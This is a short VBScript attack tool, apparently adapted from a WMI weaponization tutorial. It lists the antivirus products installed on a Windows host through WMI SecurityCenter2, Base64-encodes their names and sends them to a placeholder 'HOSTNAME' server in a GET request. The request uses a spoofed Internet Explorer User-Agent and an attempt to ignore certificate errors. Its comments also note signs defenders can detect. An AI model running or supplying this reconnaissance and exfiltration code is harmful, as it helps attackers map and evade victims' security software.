Enumerate AV and send to web server (based on https://blog.netspi.com/getting-started-wmi-weaponization-part-2/)
' Base64Encode: returns the Base64 text for binary data by assigning it to an
' MSXML element whose DataType is "bin.base64" and reading the element's Text.
'   sText   - the data to encode; the caller in this script passes the byte
'             array returned by ASCIIEncoding.GetBytes_4.
'   Returns - the element's Text property after the typed value is assigned.
' Review note: this instantiates the Microsoft.XMLDOM COM object on every call,
' so each call is a COM activation in the hosting process.
Function Base64Encode(sText)
    Dim xmlDoc, node

    Set xmlDoc = CreateObject("Microsoft.XMLDOM")
    Set node = xmlDoc.createElement("tmp")

    With node
        ' Typing the element as bin.base64 makes MSXML do the encoding.
        .DataType = "bin.base64"
        .NodeTypedValue = sText
        Base64Encode = .Text
    End With
End Function
' Script body: reads the display names of the antivirus products registered in
' the local ROOT\SecurityCenter2 WMI namespace, joins them with "|",
' Base64-encodes the ASCII bytes, and sends the result as the "id" query
' parameter of a synchronous HTTPS GET to the placeholder host "HOSTNAME".
'
' Observable behaviour a defender can key on (all visible in the code below):
'   - a WMI query "Select * from AntiVirusProduct" against ROOT\SecurityCenter2
'     issued by the process hosting this script;
'   - COM activation of MSXML2.ServerXMLHTTP, Microsoft.XMLDOM and
'     System.Text.ASCIIEncoding from that same process;
'   - an outbound GET whose query string is "?id=" followed by Base64 text;
'   - a fixed Internet Explorer 11 User-Agent string set by the script itself
'     rather than by a browser.
Dim productNames, encodedNames
Dim securityCenter, avProducts, avProduct, asciiEncoder, http

' Connect to the local Security Center namespace with impersonation.
Set securityCenter = GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2")
Set avProducts = securityCenter.ExecQuery("Select * from AntiVirusProduct")

' Build "name1|name2|...|"; every name, including the last, is followed by "|".
productNames = ""
For Each avProduct In avProducts
    productNames = productNames & avProduct.displayName & "|"
Next

' Convert the joined names to ASCII bytes, then to Base64 text.
Set asciiEncoder = CreateObject("System.Text.ASCIIEncoding")
encodedNames = Base64Encode(asciiEncoder.GetBytes_4(productNames))

Set http = CreateObject("MSXML2.ServerXMLHTTP")
With http
    ' Third argument False makes the request synchronous.
    .Open "GET", "https://HOSTNAME/?id=" & encodedNames, False

    ' NOTE(review): SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS is not defined
    ' anywhere in the visible script. Without Option Explicit an undefined name
    ' evaluates as Empty, so this subtraction writes option 2 back with its
    ' current value. The intended effect on certificate checking cannot be
    ' confirmed from here.
    .setOption 2, .getOption(2) - SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS

    .setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
    .Send
End With